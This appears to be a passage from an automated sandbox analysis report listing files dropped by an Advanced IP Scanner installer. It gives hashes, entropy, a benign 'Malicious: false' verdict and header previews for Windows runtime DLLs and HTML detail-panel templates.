Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	7.030340698171656
Encrypted:	false
SSDEEP:	384:/tZ34W2hWlgbCA0GftpBjx5C32lI663UG:w18i+66kG
MD5:	F6B4D8D403D22EB87A60BF6E4A3E7041
SHA1:	B51A63F258B57527549D5331C405EACC77969433
SHA-256:	25687E95B65D0521F8C737DF301BF90DB8940E1C0758BB6EA5C217CF7D2F2270
SHA-512:	1ACD8F7BC5D3AE1DB46824B3A5548B33E56C9BAC81DCD2E7D90FDBD1D3DD76F93CDF4D52A5F316728F92E623F73BC2CCD0BC505A259DFF20C1A5A2EB2F12E41B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.............................v............ ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-sysinfo-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19648
Entropy (8bit):	6.960490184684636
Encrypted:	false
SSDEEP:	192:nvj+UKIMFsWVghW/AvSx9YOCAs/nGfe4pBjSf3Ir9WNArXVWQ4mWSEqnajMHxxBB:7+UhW2hWISUA0GftpBjdrZolI663UU
MD5:	B9EA058418BE64F85B0FF62341F7099E
SHA1:	0B37E86267D0C6782E18F734B710817B8B03DA76
SHA-256:	653BE79FA676D052CCE60D743282018FAAAF22E15A3CB8F1EEE01F243D56B431
SHA-512:	EFAAC54C0C6648F666B58E0441315446FDBCB8544C3B9E2005482DE25E62E716D0C66DCB7A9CEDD7967FFC26E394AE9F1B1DFDCE1D4243CFDE737140D1C3D51D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.............................E............ ...................<..............8............................................................................text...U........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-timezone-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	7.0606914357897885
Encrypted:	false
SSDEEP:	192:B6awWVghW/d7l9YOCAs/nGfe4pBjSf/pjWNArXVWQ4mWgmqnajLQvTP+8jP9Tz8U:WW2hWF7QA0GftpBjQ9YlvQyURz8RG
MD5:	A20084F41B3F1C549D6625C790B72268
SHA1:	E3669B8D89402A047BFBF9775D18438B0D95437E
SHA-256:	0FA42237FD1140FD125C6EDB728D4C70AD0276C72FA96C2FAABF7F429FA7E8F1
SHA-512:	DDF294A47DD80B3ABFB3A0D82BC5F2B510D3734439F5A25DA609EDBBD9241ED78045114D011925D61C3D80B1CCD0283471B1DAD4CF16E2194E9BC22E8ABF278F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-util-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	6.97908669425612
Encrypted:	false
SSDEEP:	192:MGMWVghW/AvSx9YOCAs/nGfe4pBjSf6qy4X3WNArXVWQ4mWwiS21qnaj9RlS6VEX:iW2hWoSUA0GftpBjfHWbziS2lBRAkEX
MD5:	2886C75F8B9D3EFDF315C44B52847AEE
SHA1:	4FC75E39493B356F1F219798E3738DBC764281E4
SHA-256:	3DB27D95689F936B4591EBAD18173AD07FAC07D69D68EEFF06DEE158599D731F
SHA-512:	2931224106EEEA142664AEC9D1D5D028D15A14765BCE8674D34D67FC027F6FEFF3AF283F3D81B113E6EFCD42E6B4BD249E94E01C8F41B5211650F1775774B765
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......9+....@.............................9............ ...................<..............8............................................................................text...I........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-conio-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19648
Entropy (8bit):	6.97635016555389
Encrypted:	false
SSDEEP:	384:UjcW2hWX7QA0GftpBju0dtTxZlBRAk9l3:yAwyi8or1RAO
MD5:	3B038338C1EB179D8EEE3883CF42BC3E
SHA1:	EA97CF2EE16EF2DF3766A40C6CE33C8BE5F683B2
SHA-256:	C17786E9031062F56E4B205F394A795E11EF9367B922763DDF391F2ACAB2E979
SHA-512:	1A6D8FC065237BF0DBBA18C777958522697B6BC2BE1B16586870A0C06178D65B521F66F522BF5636DF793E4AC8A2A3DE780B3C7062273A11F52A381EE851ECE6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......Ts....@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-convert-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22720
Entropy (8bit):	6.8330909328576315
Encrypted:	false
SSDEEP:	192:sYNpdkKBcyNWVghW/77l9YOCAs/nGfe4pBjSfCKZWNArXVWQ4mWuqnajMHxxBNT5:zuyNW2hWD7QA0GftpBjLKNplI663U4v
MD5:	5245F303E96166B8E625DD0A97E2D66A
SHA1:	1C9ED748763F1FF5B14B8C791A4C29DE753A96AB
SHA-256:	90A63611D9169A8CD7D030CD2B107B6E290E50E2BEBA6FA640A7497A8599AFF5
SHA-512:	AF51F341670F925449E69C4B5F0A82F4FC4EB32913943272C32E3F3F18EE43B4AFB78C0D7D2F965C1ABE6A0F3A368616DD7A4FB74D83D22D1B69B405AEF1E043
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@...........@..........................................0...................<..............8............................................................................text............................... ..`.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-environment-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	6.969708578931716
Encrypted:	false
SSDEEP:	192:sWVghW/cgbXH9YOCAs/nGfe4pBjSf4AKWNArXVWQ4mWvMHqnajMHxxBNT0662ONh:sW2hWUgbCA0GftpBjQGEMHlI663Uh
MD5:	45C54A21261180410091CEFB23F6A5AE
SHA1:	80EEE466D086D30C61EAEFC559D57E5E64F56F61
SHA-256:	2B0FEA07DB507B7266346EAB3CA7EDE3821876AADC519DAF059B130B85640918
SHA-512:	4962F85C94162FE2E35979FFF4E4B3752F322C61D801419769916F5E3A0E0C406284D95C22709C690212D4572EB688D9311A8F85F17C4F5D1A5A9F00E732808C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......S....@............................."............ ...................<..............8............................................................................text...2........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-filesystem-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20672
Entropy (8bit):	6.979229086130751
Encrypted:	false
SSDEEP:	384:kgq6nWm5C1W2hW7SUA0GftpBjAdlI663Um:k6nWm5CTqij66km
MD5:	AB8734C2328A46E7E9583BEFEB7085A2
SHA1:	B4686F07D1217C77EB013153E6FF55B34BE0AF65
SHA-256:	921B7CF74744C4336F976DB6750921B2A0960E8AA11268457F5ED27C0E13B2C8
SHA-512:	FD7E828F842DEABF2DCDCEA3E947DC3AA909C0B6A35C75FD64EDC63C359AB97020876E6C59AD335A2A166437FA65F57433F86C1C2FE10A34B90D15D8592FE911
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......X....@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-heap-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19648
Entropy (8bit):	6.948212808065758
Encrypted:	false
SSDEEP:	192:579Y17aFBRAWVghW/FgbXH9YOCAs/nGfe4pBjSfyWNArXVWQ4mWuA3qnaj9RlS6b:OtW2hWdgbCA0GftpBjrpA3lBRAkJ
MD5:	39D81596A7308E978D67AD6FDCCDD331
SHA1:	A0B2D43DD1C27D8244D11495E16D9F4F889E34C4
SHA-256:	3D109FD01F6684414D8A1D0D2F5E6C5B4E24DE952A0695884744A6CBD44A8EC7
SHA-512:	0EF6578DE4E6BA55EDA64691892D114E154D288C419D05D6CFF0EF4240118C20A4CE7F4174EEC1A33397C6CD0135D13798DC91CC97416351775F9ABF60FCAE76
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......4....@.......................................... ...................<..............8............................................................................text...&........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-locale-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	7.02455319040347
Encrypted:	false
SSDEEP:	192:wWVghW/4gbXH9YOCAs/nGfe4pBjSfIMYgWNArXVWQ4mWu5BXqnajL1dHx3tKrSwZ:wW2hWwgbCA0GftpBjRMNBtlXBtFwuWd
MD5:	E70D8FE9D21841202B4FD1CF55D37AC5
SHA1:	FA62FB609D15C8AD3B5A12618BCC50F0D95CDEA3
SHA-256:	E087F611B3659151DFB674728202944A7C0FE71710F280840E00A5C4B640632D
SHA-512:	BD38BDF80DEFD4548580E7973D89ED29E1EDD401F202C367A3BA0020678206DA3ACC9B4436C9A122E4EFC32E80DBB39EB9BF08587E4FEBC8F14EC86A8993BCC8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......./....@.............................e............ ...................<..............8............................................................................text...u........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-math-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29376
Entropy (8bit):	6.5989266511221745
Encrypted:	false
SSDEEP:	384:K47isbM4Oe5grykfIgTmLSW2hWPgbCA0GftpBjF17cylBRAkV8:X1Mq5grxfInqH8iBgoRAz
MD5:	D0D380AF839124368A96D6AA82C7C8AE
SHA1:	E2AC42F829085E0E5BEEA29FCFF09E467810A777
SHA-256:	06985D00BF4985024E95442702BBDB53C2127E99F16440424F3380A88883F1A5
SHA-512:	DAF3997922E18C0BE088A15209C9F01CC1DDA90972A6AADCF76DE867B85D34483AD5E138E3FA321C7140BF8E455C2B908D0A4DB6A9E35011786398656B886479
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................@...............................P.......,....@..............................+...........@...............6...<..............8............................................................................text....,.......................... ..`.rsrc........@.......2..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-multibyte-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	26816
Entropy (8bit):	6.632501498817798
Encrypted:	false
SSDEEP:	384:my+Kr6aLPmIHJI6/CpG3t2G3t4odXLhW2hWjgbCA0GftpBjpCjzTZlXBtFwLd:mZKrZPmIHJI6NT8irCXDyx
MD5:	809BC1010EAF714CD095189AF236CE2F
SHA1:	10DBC383F7C49DE17FC50E830E3CB494CC873DD1
SHA-256:	B52F2B9DE19D12B0E727E13E3DDE93009E487BFB2DD97FD23952C7080949D97E
SHA-512:	F72EC10A0005E7023187EF6CCEDF2AF81D16174E628369FB834AF78E4EF2F3D44BF8B70E9B894ABC6791D7B9720C62C52A697FF0ADE0EDDDCAA52B6F14630D1D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.....$...................@...............................P............@.............................. ...........@...............,...<..............8............................................................................text....".......$.................. ..`.rsrc........@.......(..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-private-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	73408
Entropy (8bit):	5.811008103709619
Encrypted:	false
SSDEEP:	1536:nt2b2De5c4bFX2Jy2cvxXWpD9d3334BkZnkPgE79g:nw2De5c4bFX2Jy2cvxXWpD9d3334BkZ3
MD5:	1DD5666125B8734E92B1041139FA6C37
SHA1:	22E9566352E77AB15A917B45A86C0DC548431692
SHA-256:	D0FF5F6BB94961D4C17F0709297A6B5A5FA323C9AC82F4FE27187912B4B13CF3
SHA-512:	420B9184842ECD7969BF75F0D8A62569725624AE413C83EE3B6F26973318B4170287F657F2BE8DD3E7FC71264D69B2203E016D078615AD6E31E65033D5C59654
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................................................................@.............................8................................<..............8............................................................................text...H........................... ..`.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-process-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19648
Entropy (8bit):	6.961849079425489
Encrypted:	false
SSDEEP:	192:pYTRQqjd7NWVghW/RmgbXH9YOCAs/nGfe4pBjSf1wjWNArXVWQ4mW4C0zA7qnajP:2KcW2hW5mgbCA0GftpBjLKlvQyURz8x
MD5:	8F8A47617DFD829A63E3EC4AFF2718D9
SHA1:	1D7DC26BB9C78C4499514FB3529B3478AECF7340
SHA-256:	6D4A1AAD695A3451C2D3F564C7CC8D37192CD35539874DF6AE55E24847E51784
SHA-512:	D3B96B1F80C20DE58A4D4179177E1C1C2B460719968FBA42E1BA694D890342AAAB5A8C67E7FFDD126B2FC6D6A7B2408952279D8926B14BF2DF11740483867821
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......\r....@.............................x............ ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-runtime-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	23232
Entropy (8bit):	6.854338104703726
Encrypted:	false
SSDEEP:	384:5b7hrKIW2hW6SUA0GftpBjoQt1TlI663UMp:5bNrKcziZzW66kMp
MD5:	AE3FA6BF777B0429B825FB6B028F8A48
SHA1:	B53DBFDB7C8DEAA9A05381F5AC2E596830039838
SHA-256:	66B86ED0867FE22E80B9B737F3EE428BE71F5E98D36F774ABBF92E3AACA71BFB
SHA-512:	1339E7CE01916573E7FDD71E331EEEE5E27B1DDD968CADFA6CBC73D58070B9C9F8D9515384AF004E5E015BD743C7A629EB0C62A6C0FA420D75B069096C5D1ECE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@......@.....@..........................................0...................<..............8............................................................................text............................... ..`.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-stdio-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	24768
Entropy (8bit):	6.784463110154403
Encrypted:	false
SSDEEP:	384:vUFVhjW2hWcgbCA0GftpBjH95mnlvQyURz8te:szC8iEvU2Y
MD5:	32D7B95B1BCE23DB9FBD0578053BA87F
SHA1:	7E14A34AC667A087F66D576C65CD6FE6C1DFDD34
SHA-256:	104A76B41CBD9A945DBA43A6FFA8C6DE99DB2105D4CE93A717729A9BD020F728
SHA-512:	7DAD74A0E3820A8237BAB48F4962FE43E5B60B00F003A5DE563B4CF61EE206353C9689A639566DC009F41585B54B915FF04F014230F0F38416020E08C8A44CB4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@.......h....@.............................a............0...............$...<..............8............................................................................text...q........................... ..`.rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-string-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	24768
Entropy (8bit):	6.778007627268145
Encrypted:	false
SSDEEP:	768:J6S5yguNvZ5VQgx3SbwA71IkF+w8iB66kP:Jl5yguNvZ5VQgx3SbwA71Itnb6kP
MD5:	5E72659B38A2977984BBC23ED274F007
SHA1:	EA622D608CC942BDB0FAD118C8060B60B2E985C9
SHA-256:	44A4DB6080F6BDAE6151F60AE5DC420FAA3BE50902E88F8F14AD457DEC3FE4EA
SHA-512:	ED3CB656A5F5AEE2CC04DD1F25B1390D52F3E85F0C7742ED0D473A117D2AC49E225A0CB324C31747D221617ABCD6A9200C16DD840284BB29155726A3AA749BB1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@...........@..........................................0...............$...<..............8............................................................................text............................... ..`.rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-time-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	21184
Entropy (8bit):	6.908629649625132
Encrypted:	false
SSDEEP:	384:UzW2hWEgbCA0GftpBjJ6EKz3lvQyURz8X:y28i36bdvU2X
MD5:	1FA7C2B81CDFD7ACE42A2A9A0781C946
SHA1:	F5B7117D18A7335228829447E3ECCC7B806EF478
SHA-256:	CAFDB772A1D7ACF0807478FDBA1E00FD101FC29C136547B37131F80D21DACFFD
SHA-512:	339CDAF8DE445CF05BC201400D65BB9037EA7A3782BA76864842ADB6FBE5445D06863227DD774AB50E6F582B75886B302D5DD152AFF1825CF90E4F252398ACE0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-utility-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	7.011995208399749
Encrypted:	false
SSDEEP:	192:XY9fHQduPWVghW/EgbXH9YOCAs/nGfe4pBjSfbxaWNArXVWQ4mW0qnajMHxxBNTM:ef5W2hWcgbCA0GftpBjuYDlI663UD
MD5:	D6ABF5C056D80592F8E2439E195D61AC
SHA1:	33F793FD6A28673E766AD11EE1CF8EB8EF351BC0
SHA-256:	8858D883D180CEA63E3BF4A3F5BC9E0F9FA16C9A35A84C4EFE65308CEA13A364
SHA-512:	6678F17F2274AABBA5279BA40A0159FF8A54241D811845A48D845172F4AA6F7397CFD07BF2368299A613DF1F3FF12E06C0E62C26683DFB08D82122609C3A3F62
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......T....@.............................^............ ...................<..............8............................................................................text...n........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\details_panel_ar_sa.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1800
Entropy (8bit):	4.977566387382036
Encrypted:	false
SSDEEP:	48:ngn27UxOUZyUejUC3UCJ8UZzoUH0OUvMU70qlUQCU2DYlO:gj7Lfdk3tM/4qyMVO
MD5:	C342B5AAD7F710F39DD20641A1B3DF78
SHA1:	7C3636884EE5A170230CAD8D3B5BB875E59C8DF8
SHA-256:	A550CB4323FFBC96B8BED4E5A8F1A82E0EAAAF2987FF794DB55C7D48FB1CAFDC
SHA-512:	CEC17544EB60EB296A742AF55D010EA5D31D3DC34E9DF809B58EFA074F195FA19032C6190FEBBE801E16BDE7A18C5463E35ADC334F34ABEC7B1DFD1E0632BCF6
Malicious:	false
Preview:	<hr>..<h3 align="right" style="margin-right:2em">{name}</h3><p></p>..<table align="right">...<tr><td dir="rtl" align="right" style="padding-left:1em">{status}</td><td dir="rtl" align="right"><b>......:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{os}</td><td dir="rtl" align="right"><b>.... .......:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{ip}</td><td dir="rtl" align="right"><b>IP:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{mac}</td><td dir="rtl" align="right"><b>MAC:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{manufacturer}</td><td dir="rtl" align="right"><b>...... .......:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{netbios}</td><td dir="rtl" align="right"><b>NetBIOS:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{user}</td><td dir="rtl" align="right"><b>........:</b></t

C:\Program Files (x86)\Advanced IP Scanner\details_panel_bg_bg.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1244
Entropy (8bit):	5.128056579045673
Encrypted:	false
SSDEEP:	24:lFojhoCsuSH9AXqJH39/t0Kt5RGDXS9ReEhyv:HuZsRH9AXqJHN/t0U2DYs
MD5:	1C7DAA7B7C3119E37B599739F3372A97
SHA1:	D8E90B30F5D754C8B7623CF6FE3E5D298E620201
SHA-256:	DE38F8530D51823F9DDCB33D410D738513C5E83B7284278507F9FBEA2BF29650
SHA-512:	ED3A0FE123F4488AE9A4547B984CC7A21285D2F9638D9A25B772E853D45A3539B1C847046A85159F54029B572B8D9FCE80A4746C8D13928B9AD998F7D6DF4A1F
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>.........:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>........... .......:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>............:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>..........:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>....:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>.........:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">..

C:\Program Files (x86)\Advanced IP Scanner\details_panel_cs_cz.tpl (copy)

Download File

